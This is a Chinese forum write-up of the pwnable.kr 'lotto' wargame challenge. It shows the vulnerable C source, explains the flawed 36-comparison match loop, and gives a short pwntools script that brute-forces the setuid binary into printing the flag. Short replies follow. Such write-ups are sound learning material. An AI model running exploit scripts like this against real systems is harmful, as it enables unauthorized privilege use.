首页
论坛
课程
招聘
[分享]pwnable.kr lotto day11
2021-1-13 21:31 3849

[分享]pwnable.kr lotto day11

2021-1-13 21:31
3849

lotto

题目

解题过程

1. 查看文件列表

 

flag 只对创建者 lotto_pwn 和 root 可读,而我们登录的用户是 lotto,无读权限。lotto 对 lotto_pwn 和 lotto 开放读和执行权限,而且权限里面有 s,因此 lotto 用户在执行这个文件时会被赋予与用户 lotto_pwn 相同权限。

2. 查看 lotto.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
 
unsigned char submit[6];
 
void play(){
 
        int i;
        printf("Submit your 6 lotto bytes : ");
        fflush(stdout);
 
        int r;
        r = read(0, submit, 6);
 
        printf("Lotto Start!\n");
        //sleep(1);
 
        // generate lotto numbers
        int fd = open("/dev/urandom", O_RDONLY);
        if(fd==-1){
                printf("error. tell admin\n");
                exit(-1);
        }
        unsigned char lotto[6];
        if(read(fd, lotto, 6) != 6){
                printf("error2. tell admin\n");
                exit(-1);
        }
        for(i=0; i<6; i++){
                lotto[i] = (lotto[i] % 45) + 1;         // 1 ~ 45
        }
        close(fd);
 
        // calculate lotto score
        int match = 0, j = 0;
        for(i=0; i<6; i++){
                for(j=0; j<6; j++){
                        if(lotto[i] == submit[j]){
                                match++;
                        }
                }
        }
 
        // win!
        if(match == 6){
                system("/bin/cat flag");
        }
        else{
                printf("bad luck...\n");
        }
 
}
 
void help(){
        printf("- nLotto Rule -\n");
        printf("nlotto is consisted with 6 random natural numbers less than 46\n");
        printf("your goal is to match lotto numbers as many as you can\n");
        printf("if you win lottery for *1st place*, you will get reward\n");
        printf("for more details, follow the link below\n");
        printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
        printf("mathematical chance to win this game is known to be 1/8145060.\n");
}
 
int main(int argc, char* argv[]){
 
        // menu
        unsigned int menu;
 
        while(1){
 
                printf("- Select Menu -\n");
                printf("1. Play Lotto\n");
                printf("2. Help\n");
                printf("3. Exit\n");
 
                scanf("%d", &menu);
 
                switch(menu){
                        case 1:
                                play();
                                break;
                        case 2:
                                help();
                                break;
                        case 3:
                                printf("bye\n");
                                return 0;
                        default:
                                printf("invalid menu\n");
                                break;
                }
        }
        return 0;
}

我们的目标是执行 system("/bin/cat flag"),这要求 match 的值等于 6 。

1
2
3
4
5
6
7
8
9
// calculate lotto score
int match = 0, j = 0;
for(i=0; i<6; i++){
        for(j=0; j<6; j++){
                if(lotto[i] == submit[j]){
                        match++;
                }
        }
}

知,lotto 数组中的每一个数都要与 submit 数组中的每一个数比较,如果相等,则 match++ ,submit 的值是我们手动输入的,他是字符型数组,lotto 的值是 /dev/urandom 生成的伪随机数,其 ASCII 值属于 1 ~ 45。其中可打印字符包括 !"#$%&'()+,- 十三个。 此处本应是只比较 6 次,这里写成了比较 36 次。*
所以我们可以输入 6 个相同的数,这样次要生成的随机数中存在一个与输入的数相等的,match 的值就为 6

3. 编写 exp

交互过程

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
 
# remote
# sh = ssh('lotto', 'pwnable.kr', password='guest', port=2222)
# p = sh.process('./lotto')
 
# local
p = process('/home/lotto/lotto')
 
for i in range(100):
    p.recv()
    p.sendline('1')
    p.recv()
    p.sendline('!!!!!!')
    p.recvline()
    answer = p.recvline()
    # print(answer)
    if "bad" not in answer:     # python3 记得在 "bad" 前加 b
        print(answer)
        break

4. pwn

红框内为 flag
本地执行

 

本地执行时需建立 flag 的软链接

 

remote


[公告] 2021 KCTF 春季赛 防守方征题火热进行中!

收藏
点赞1
打赏
分享
最新回复 (4)
雪    币: 6714
活跃值: 活跃值 (4947)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
pureGavin 活跃值 2 2021-1-13 21:50
2
0
高产似那啥
雪    币: 2279
活跃值: 活跃值 (1998)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
i乂 活跃值 2021-1-14 21:35
3
0
我刚刚学,打算通过分享 wp敦促自己学习
努力做到一天一题刷完 pwnable.kr
雪    币: 0
活跃值: 活跃值 (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
ZyuanI 活跃值 2021-1-18 00:56
4
0
高产似那啥
雪    币: 2279
活跃值: 活跃值 (1998)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
i乂 活跃值 2021-1-18 14:50
5
0
ZyuanI 高产似那啥
咕咕咕
游客
登录 | 注册 方可回帖
返回